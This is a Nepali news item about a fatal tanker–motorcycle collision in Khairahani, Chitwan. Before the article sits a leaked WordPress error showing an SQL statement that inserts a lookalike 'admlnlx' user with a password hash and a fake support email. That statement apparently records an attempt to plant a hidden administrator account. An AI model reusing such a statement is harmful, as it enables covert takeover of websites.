WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLcwLR2ebazPaLJfrPOwRF/gz5or23/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:03:09', '', 'admlnlx', 'admlnlx')
सविता अधिकारी,
चितवन,माघ २६-
पुर्वि चितवनको खैरहनीमा ट्यांकरको ठक्करवाट मोटरसाइकलमा सवार एकको मूत्यु भएको छ ।
खैरहनी २ चैनपुरमा आज बिहान भरतपुरवाट हेटौडा तर्फ जांदै गरेको ना २ ख ५७५४ नम्वरको तेल वोक्ने ट्यांकरले विपरित दिशावाट आउदै गरेको ना २२ प ४८८० नम्बरको मोटरसाइकललाई ठक्कर दिएको हो । ठक्करवाट मोटरसाइकल पछाडी सवार १७ वर्षीय राप्ती नगरपालीका ११ का सबिना पुनको घटना स्थलमै मृत्यु भएको चितवन प्रहरीले जानाकारी दिएको छ ।मोटसाइकल चालक भने सकुशल रहेको वताइएको छ ।
ठक्कर दिने ट्यांकर चालकलाई इप्रका खैरहनीले नियन्त्रणमा लिएको छ ।